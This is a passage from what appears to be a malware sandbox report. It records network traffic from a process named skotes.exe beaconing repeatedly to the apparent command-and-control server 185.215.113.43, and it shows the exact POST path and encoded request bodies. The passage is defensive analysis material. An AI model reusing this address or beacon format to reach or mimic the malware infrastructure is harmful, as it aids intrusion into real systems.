Sep 25, 2024 07:59:24.005101919 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:24.005111933 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:24.005705118 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:24.010524035 CEST	80	49725	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:24.705360889 CEST	80	49725	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:24.705432892 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.216495991 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.216814995 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.225078106 CEST	80	49726	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:26.225203991 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.225338936 CEST	80	49725	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:26.225404024 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.225436926 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:26.233639956 CEST	80	49726	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:26.942253113 CEST	80	49726	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:26.942373037 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.560261011 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.560633898 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.565418005 CEST	80	49726	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:28.565438986 CEST	80	49727	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:28.565524101 CEST	49726	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.565584898 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.565680027 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:28.570460081 CEST	80	49727	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:29.271599054 CEST	80	49727	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:29.271752119 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.778975964 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.779247046 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.910022974 CEST	80	49728	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:30.910341024 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.910406113 CEST	80	49727	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:30.910465956 CEST	49727	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.910547018 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:30.915323019 CEST	80	49728	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:31.615658998 CEST	80	49728	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:31.615731955 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.248960972 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.249428034 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.255027056 CEST	80	49728	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:33.255112886 CEST	49728	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.255181074 CEST	80	49729	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:33.255249023 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.257971048 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:33.263988972 CEST	80	49729	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:33.949970007 CEST	80	49729	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:33.950185061 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.466413021 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.466738939 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.471607924 CEST	80	49730	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:35.471752882 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.471842051 CEST	80	49729	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:35.471899033 CEST	49729	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.472042084 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:35.476835966 CEST	80	49730	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:36.178044081 CEST	80	49730	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:36.178165913 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.812056065 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.812350988 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.817260981 CEST	80	49732	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:37.817380905 CEST	80	49730	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:37.817508936 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.817636013 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.817717075 CEST	49730	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:37.822333097 CEST	80	49732	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:38.518563986 CEST	80	49732	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:38.518659115 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.029486895 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.029829979 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.047677040 CEST	80	49733	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:40.047811031 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.048300028 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.051448107 CEST	80	49732	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:40.051557064 CEST	49732	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:40.053083897 CEST	80	49733	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:40.750222921 CEST	80	49733	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:40.750381947 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.372673035 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.372951031 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.377831936 CEST	80	49734	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:42.377948046 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.378040075 CEST	80	49733	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:42.378098011 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.381732941 CEST	49733	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:42.382853985 CEST	80	49734	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:43.086662054 CEST	80	49734	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:43.086735010 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.596925974 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.602204084 CEST	80	49734	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:44.602284908 CEST	49734	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.605155945 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.610037088 CEST	80	49735	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:44.610138893 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.618026972 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:44.622874022 CEST	80	49735	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:45.332669020 CEST	80	49735	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:45.332757950 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.950570107 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.950886011 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.955921888 CEST	80	49735	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:46.955938101 CEST	80	49736	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:46.955980062 CEST	49735	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.956021070 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.956161976 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:46.961256981 CEST	80	49736	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:47.687269926 CEST	80	49736	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:47.687331915 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.203110933 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.203486919 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.208801985 CEST	80	49737	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:49.208945036 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.208971977 CEST	80	49736	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:49.209053040 CEST	49736	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.209278107 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:49.214055061 CEST	80	49737	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:49.916423082 CEST	80	49737	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:49.916506052 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.544745922 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.545561075 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.549879074 CEST	80	49737	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:51.549994946 CEST	49737	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.550354958 CEST	80	49738	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:51.550442934 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.550657988 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:51.555417061 CEST	80	49738	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:52.250567913 CEST	80	49738	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:52.250646114 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.763336897 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.763684988 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.770210981 CEST	80	49739	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:53.770329952 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.770338058 CEST	80	49738	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:53.770411968 CEST	49738	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.770726919 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:53.777204990 CEST	80	49739	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:54.498406887 CEST	80	49739	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:54.498529911 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.122667074 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.123078108 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.127851009 CEST	80	49740	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:56.127959013 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.128079891 CEST	80	49739	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:56.128125906 CEST	49739	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.128221035 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:56.132946014 CEST	80	49740	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:56.826505899 CEST	80	49740	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:56.826702118 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.343527079 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.343844891 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.350128889 CEST	80	49741	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:58.350234032 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.350286961 CEST	80	49740	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:58.350339890 CEST	49740	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.350466013 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:58.357485056 CEST	80	49741	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:59.049371958 CEST	80	49741	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:59.049439907 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.670145988 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.670555115 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.675246000 CEST	80	49741	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:00.675339937 CEST	49741	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.675364017 CEST	80	49742	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:00.675443888 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.675582886 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:00.680308104 CEST	80	49742	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:01.376663923 CEST	80	49742	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:01.376765966 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.920270920 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.922004938 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.925671101 CEST	80	49742	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:02.925750971 CEST	49742	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.926841021 CEST	80	49743	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:02.927021980 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.927334070 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:02.932109118 CEST	80	49743	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:03.623218060 CEST	80	49743	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:03.623267889 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.251302004 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.251641989 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.256594896 CEST	80	49743	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:05.256624937 CEST	80	49744	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:05.256696939 CEST	49743	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.256732941 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.256890059 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:05.261640072 CEST	80	49744	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:05.943475008 CEST	80	49744	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:05.943627119 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.450778008 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.451137066 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.456578016 CEST	80	49744	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:07.456634045 CEST	80	49745	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:07.456667900 CEST	49744	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.456748009 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.456906080 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:07.463082075 CEST	80	49745	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:08.154839993 CEST	80	49745	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:08.154934883 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.780788898 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.781092882 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.785886049 CEST	80	49746	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:09.786016941 CEST	80	49745	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:09.786025047 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.786066055 CEST	49745	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.786195993 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:09.790884972 CEST	80	49746	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:10.495562077 CEST	80	49746	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:10.495708942 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:11.997577906 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:11.997920036 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:12.003242970 CEST	80	49746	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:12.003288984 CEST	80	49747	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:12.003336906 CEST	49746	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:12.003407001 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:12.003570080 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:12.008383036 CEST	80	49747	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:12.698942900 CEST	80	49747	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:12.699053049 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.329586983 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.329873085 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.334822893 CEST	80	49748	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:14.334934950 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.335133076 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.336221933 CEST	80	49747	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:14.336298943 CEST	49747	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:14.339948893 CEST	80	49748	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:15.031692028 CEST	80	49748	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:15.031830072 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.546022892 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.546292067 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.551234961 CEST	80	49749	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:16.551316023 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.551457882 CEST	80	49748	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:16.551474094 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.551511049 CEST	49748	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:16.556327105 CEST	80	49749	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:17.254604101 CEST	80	49749	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:17.254735947 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.877684116 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.877971888 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.884253979 CEST	80	49749	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:18.884349108 CEST	49749	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.884408951 CEST	80	49750	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:18.884488106 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.887989044 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:18.894440889 CEST	80	49750	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:19.576565027 CEST	80	49750	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:19.576694965 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.093641043 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.094037056 CEST	49751	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.403188944 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.467968941 CEST	80	49751	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:21.468012094 CEST	80	49750	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:21.468050003 CEST	80	49750	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:21.468213081 CEST	49750	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.468234062 CEST	49751	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.468439102 CEST	49751	80	192.168.2.8	185.215.113.43
Sep 25, 2024 08:00:21.473253012 CEST	80	49751	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:22.193391085 CEST	80	49751	185.215.113.43	192.168.2.8
Sep 25, 2024 08:00:22.193485975 CEST	49751	80	192.168.2.8	185.215.113.43

HTTP Request Dependency Graph

185.215.113.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49718	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:10.298302889 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:11.026473045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49719	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:12.549755096 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:13.244261980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49721	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:14.881127119 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:15.590009928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49722	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:17.096604109 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:17.810853004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49723	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:19.440556049 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:20.139668941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49724	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
